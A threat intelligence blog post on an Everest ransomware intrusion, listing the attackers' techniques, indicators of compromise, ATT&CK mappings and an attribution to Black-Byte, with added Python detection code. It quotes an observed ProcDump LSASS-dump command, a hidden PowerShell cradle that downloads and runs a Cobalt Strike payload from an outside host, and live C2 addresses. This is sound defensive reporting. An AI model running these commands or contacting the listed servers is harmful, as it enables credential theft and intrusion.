Climbing Mount Everest: Black-Byte Bytes Back?

Authored by: Michael Mullen and Nikolaos Pantazopoulos

Summary

tl;dr

In the Threat Pulse released in November 2021 we touched on the Everest ransomware group. This blog documents the TTPs employed by a group that was observed deploying Everest ransomware during a recent incident response engagement.

In summary, we identified the following key TTPs:

  • Lateral Movement through Remote Desktop Protocol (RDP)
  • Gathering of internal IP addresses for hosts on the network
  • Local LSASS dumps
  • NTDS.dit dumps
  • Installation of Remote Access Tools for persistence

Everest Ransomware

Earlier reports [1] have linked Everest ransomware to the Everbe 2.0 family, which is composed of the Embrace, PainLocker, EvilLocker and Hyena Locker ransomware. However, after recovering and analysing an Everest ransomware file, we assess with medium confidence that Everest ransomware is related to Black-Byte.

Everest TTPs

Lateral Movement

The threat actor was observed using legitimate compromised user accounts and Remote Desktop Protocol (RDP) for lateral movement.

Credential Access

ProcDump was used to create a copy of the LSASS process in order to access additional credentials. The following command was observed being executed:

C:\Users\<Compromised User>\Desktop\procdump64.exe -ma lsass.exe C:\Users\<Compromised User>\Desktop\lsass<victim’s domain name>.dmp

The dump file name was the string lsass followed by the victim’s domain name, for example lsasscontoso.dmp.

A copy of the NTDS database was also created with a file name of ntds.dit.zip.

Defence Evasion

Throughout the incident the threat actor routinely removed tooling, reconnaissance output files and data collection archives from hosts.

Discovery

Network discovery was observed upon the compromise of each new host. This activity was primarily conducted using netscan.exe, netscanpack.exe and SoftPerfectNetworkScannerPortable.exe. These tools allow network scans to identify further hosts of interest as well as to build a target list for ransomware deployment.

The output of these tools was saved as text files in the C:\Users\Public\Downloads\ directory. Examples are included below:

  • C:\Users\Public\Downloads\subnets.txt
  • C:\Users\Public\Downloads\trustdumps.txt

Collection

The threat actor installed the WinRAR application on a file server which was then used to archive data ready for exfiltration.

Command and Control

Cobalt Strike was the primary command and control mechanism used by the threat actor. This was executed on hosts using the following command:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('<IP Address>/a'))

Additionally, a Metasploit payload was identified within the path C:\Users\Public\l.exe.

The following Remote Access Tools were also deployed by the threat actor as a secondary command and control method. Because each tool was installed as a service, they also provided additional persistence:

  • AnyDesk
  • Splashtop Remote Desktop
  • Atera
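Detection logic for three of the TTPs described above (the ProcDump LSASS dump, the PowerShell download cradle used to stage Cobalt Strike, and the remote access tools installed as services), run over constructed event records. This is example code added here, not tooling from the engagement; it assumes process-creation and service-installation events have already been normalised into dicts with the keys shown, and the user name, IP address and paths in the sample records are constructed.

```python
import re
from typing import Optional

# Constructed sample records modelled on Windows process-creation (4688 / Sysmon 1)
# and service-installation (7045) events; the values are illustrative, not from the case.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Users\jdoe\Desktop\procdump64.exe",
     "cmdline": r"procdump64.exe -ma lsass.exe C:\Users\jdoe\Desktop\lsasscontoso.dmp"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                ".downloadstring('http://192.0.2.10/a'))"},
    {"type": "service", "name": "AnyDesk", "path": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"type": "service", "name": "Spooler", "path": r"C:\Windows\System32\spoolsv.exe"},
]

# Matching on the "-ma lsass" arguments rather than the file name also catches a renamed
# procdump binary.
LSASS_DUMP = re.compile(r"\s-ma\s+lsass(\.exe)?\b", re.I)
# IEX / Invoke-Expression followed by DownloadString: the cradle observed in the incident.
DOWNLOAD_CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I)
# Remote access tools the actor installed as services for persistence.
RAT_MARKERS = ("anydesk", "splashtop", "atera")


def classify(event: dict) -> Optional[str]:
    """Return the ATT&CK technique ID the record matches, or None if it looks benign."""
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        if LSASS_DUMP.search(cmd):
            return "T1003.001"  # OS Credential Dumping: LSASS Memory
        if DOWNLOAD_CRADLE.search(cmd):
            return "T1059.001"  # Command and Scripting Interpreter: PowerShell
    elif event.get("type") == "service":
        blob = (event.get("name", "") + " " + event.get("path", "")).lower()
        if any(marker in blob for marker in RAT_MARKERS):
            return "T1543.003"  # Create or Modify System Process: Windows Service
    return None


def triage(events):
    """Pair every suspicious record with its technique ID; benign records are dropped."""
    return [(e, t) for e in events if (t := classify(e)) is not None]


if __name__ == "__main__":
    for event, technique in triage(SAMPLE_EVENTS):
        print(technique, event.get("cmdline") or event.get("path"))
```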

Exfiltration

The threat actor utilised the file transfer capabilities of Splashtop to exfiltrate data out of the network.

Impact

Everest’s actions on objectives appear to focus on the exfiltration of sensitive data as well as encryption, a combination commonly referred to as double extortion.

Indicators of Compromise

| IOC value | Indicator type | Description |
|---|---|---|
| netscan.exe | File name | SoftPerfect Network Scanner |
| netscanpack.exe | File name | Could not be analysed during the investigation. |
| svcdsl.exe | File name | SoftPerfect Network Scanner Portable |
| Winrar.exe | File name | Popular archiving tool, which supports encryption. |
| subnets.txt | File name | Network discovery output file |
| trustdumps.txt | File name | Network discovery output file |
| l.exe | File name | Metasploit payload |
| hxxp://3.22.79[.]23:8080/ | URL | Site hosting Cobalt Strike beacon |
| hxxp://3.22.79[.]23:8080/a | URL | Site hosting Cobalt Strike beacon |
| hxxp://3.22.79[.]23:10443/ga.js | URL | Cobalt Strike C2 |
| hxxp://18.193.71[.]144:10443/match | URL | Cobalt Strike C2 |
| hxxp://45.84.0[.]164:10443/o6mJ | URL | Meterpreter C2 |
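Refanging the URL indicators from the table and matching them against proxy logs, as an added example that is not part of the original report: the host and port values come from the table above, while the proxy log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit

# C2 URLs exactly as defanged in the IoC table above.
DEFANGED_C2 = [
    "hxxp://3.22.79[.]23:8080/",
    "hxxp://3.22.79[.]23:8080/a",
    "hxxp://3.22.79[.]23:10443/ga.js",
    "hxxp://18.193.71[.]144:10443/match",
    "hxxp://45.84.0[.]164:10443/o6mJ",
]


def refang(url: str) -> str:
    """Undo the hxxp:// and [.] defanging so the URL can be parsed normally."""
    return re.sub(r"^hxxp", "http", url, flags=re.I).replace("[.]", ".")


def c2_endpoints(defanged):
    """Reduce the IoC list to the set of (host, port) pairs a proxy log records."""
    parsed = [urlsplit(refang(u)) for u in defanged]
    return {(p.hostname, p.port) for p in parsed}


# Constructed proxy access log: timestamp, client, method, request target.
PROXY_LOG = """\
1700000000.123 10.0.0.5 GET http://3.22.79.23:8080/a
1700000001.456 10.0.0.5 CONNECT 18.193.71.144:10443
1700000002.789 10.0.0.7 GET http://example.com/index.html
1700000003.012 10.0.0.9 CONNECT 45.84.0.164:443
"""


def request_endpoint(method: str, target: str):
    """Map a proxy request to (host, port); CONNECT targets carry no scheme."""
    if method == "CONNECT":
        host, _, port = target.rpartition(":")
        return host, int(port)
    parts = urlsplit(target)
    return parts.hostname, parts.port or (443 if parts.scheme == "https" else 80)


def find_c2_hits(log_text: str, endpoints):
    """Return (client, target) for every request that reached a listed C2 endpoint."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue
        _ts, client, method, target = fields
        if request_endpoint(method, target) in endpoints:
            hits.append((client, target))
    return hits
```

Note that the last log line reaches a listed host on a different port and is deliberately not reported; a looser host-only match would flag it and is a reasonable choice during active triage.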

Attribution

The recovered ransomware binary is attributed, based on the ransom note, to the ‘Everest group’. However, after analysing it, we attributed the sample to Black-Byte (the C# variant rather than the Go one). It should be noted that the sample’s compilation timestamp does match the incident’s timeline.

Even though the sample’s functionality remains the same, we noticed that it no longer downloads the key from a server. Instead, the key is generated (randomly) on the compromised host. In addition, the ransomware’s onion link is different.

Based on our findings, we cannot confirm whether a different threat actor copied the source code of Black-Byte and started using it, or whether Black-Byte has indeed started using the C# ransomware variant again.

MITRE ATT&CK®

| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | External Remote Services | T1133 | Initial access was through an insecure external service |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Threat actor utilised PowerShell to execute malicious commands |
| Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Threat actor utilised Windows Command Shell to execute malicious commands |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 | Lateral movement was observed utilising RDP |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 | Threat actor installed remote desktop software tools as services for persistence |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | The tool ProcDump was used to create a copy of the LSASS process |
| Credential Access | OS Credential Dumping: NTDS | T1003.003 | The NTDS.dit was copied |
| Defence Evasion | Indicator Removal on Host: File Deletion | T1070.004 | Threat actor routinely deleted tooling and output |
| Discovery | Network Service Discovery | T1046 | Threat actor utilised numerous network discovery tools – Netscan and SoftPerfect Network Scanner |
| Collection | Archive Collected Data: Archive via Utility | T1560.001 | Threat actor archived data using WinRAR |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | Cobalt Strike was implemented using HTTPS for C2 traffic |
| Command and Control | Remote Access Software | T1219 | Threat actor utilised remote access software – AnyDesk, Splashtop and Atera |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | Data exfiltration was conducted using the Splashtop application |
| Impact | Data Encrypted for Impact | T1486 | Data was encrypted for impact |

References